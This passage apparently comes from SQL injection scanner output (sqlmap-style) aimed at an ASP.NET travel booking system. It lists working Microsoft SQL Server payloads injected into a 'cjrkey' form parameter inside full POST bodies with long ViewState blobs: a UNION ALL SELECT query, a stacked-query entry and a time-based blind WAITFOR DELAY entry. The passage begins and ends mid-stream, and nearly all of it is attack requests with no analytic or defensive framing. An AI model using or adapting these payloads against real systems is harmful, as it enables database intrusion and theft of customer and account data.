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&__EVENTVALIDATION=/wEWPgL4oLG6DQKP2NOjDAKQ2NOjDAKft/lNAuikz5UDApi4iOoEAoznisYGArursYYIApzEg7wPAoXZ9dsDApGU9SQCrcaEtQIClYq34AMCuo/QxA4CgYvYlw4ClI2NyAECj6H92wkC5tOOxAgChOWGmAQCh+WGmAQCluWGmAQCmeWGmAQCgeXGmwQCgeXKmwQCgeXOmwQCgeXymwQCgeX2mwQCgeX6mwQCgeX+mwQCgeXimwQCgeWmmAQCgeWqmAQCgOXGmwQCgOXKmwQCgOXOmwQCgOXymwQCgOX2mwQCpuTkuwcC4s3XnAMCy626qA0C0fjq7AkCg/XxpggCmYrurQkC6YuC1AsC06HBqQcCutuV1AQC8+sEAsuR9c8MAvjTm+QLAo3S39oNAsih8ecFAqDCk/ENAtLNlZ0JAuekk8gEAuiX56oEAsiDhOgJAoLey+EPAvHrsI8HAuzVi9wEAobfk9cFAsCV1cAIAtaUz5sC9U5aJB3VbcQ1pX+Dk5s/xscEkJ4WmW6r9DIW5K08LSo=&ckfs_sel=0&cjrkey=aaa%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR(79)+CHAR(113)+CHAR(106)+CHAR(103)+CHAR(72)+CHAR(81)+CHAR(116)+CHAR(108)+CHAR(80)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &company=%E8%BE%93%E5%85%A5%E5%AE%A2%E6%88%B7%E5%8D%A1%E5%8F%B7%E6%88%96%E6%8B%BC%E9%9F%B3%E6%9F%A5%E8%AF%A2&Button1=%E6%9F%A5%E8%AF%A2%E6%97%85%E5%AE%A2&lx_key=&lxid=0&a_company=&a_telphone=&a_mobile=&a_email=&a_website=&a_content=&pdate=2015-06-15&ptime=12&txuser=&subject=&info=&sms_mb=&sms_birthdaymb=&memberid=0&cjrid=0&cjrinfo=&hotline=021-21458747&office=wux119&kefu=admin&rtpnr=&meflag=admin&birthday_num=1s
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=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&__EVENTVALIDATION=/wEWPgL4oLG6DQKP2NOjDAKQ2NOjDAKft/lNAuikz5UDApi4iOoEAoznisYGArursYYIApzEg7wPAoXZ9dsDApGU9SQCrcaEtQIClYq34AMCuo/QxA4CgYvYlw4ClI2NyAECj6H92wkC5tOOxAgChOWGmAQCh+WGmAQCluWGmAQCmeWGmAQCgeXGmwQCgeXKmwQCgeXOmwQCgeXymwQCgeX2mwQCgeX6mwQCgeX+mwQCgeXimwQCgeWmmAQCgeWqmAQCgOXGmwQCgOXKmwQCgOXOmwQCgOXymwQCgOX2mwQCpuTkuwcC4s3XnAMCy626qA0C0fjq7AkCg/XxpggCmYrurQkC6YuC1AsC06HBqQcCutuV1AQC8+sEAsuR9c8MAvjTm+QLAo3S39oNAsih8ecFAqDCk/ENAtLNlZ0JAuekk8gEAuiX56oEAsiDhOgJAoLey+EPAvHrsI8HAuzVi9wEAobfk9cFAsCV1cAIAtaUz5sC9U5aJB3VbcQ1pX+Dk5s/xscEkJ4WmW6r9DIW5K08LSo=&ckfs_sel=0&cjrkey=aaa%'; WAITFOR DELAY '0:0:5'--&company=%E8%BE%93%E5%85%A5%E5%AE%A2%E6%88%B7%E5%8D%A1%E5%8F%B7%E6%88%96%E6%8B%BC%E9%9F%B3%E6%9F%A5%E8%AF%A2&Button1=%E6%9F%A5%E8%AF%A2%E6%97%85%E5%AE%A2&lx_key=&lxid=0&a_company=&a_telphone=&a_mobile=&a_email=&a_website=&a_content=&pdate=2015-06-15&ptime=12&txuser=&subject=&info=&sms_mb=&sms_birthdaymb=&memberid=0&cjrid=0&cjrinfo=&hotline=021-21458747&office=wux119&kefu=admin&rtpnr=&meflag=admin&birthday_num=1s
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=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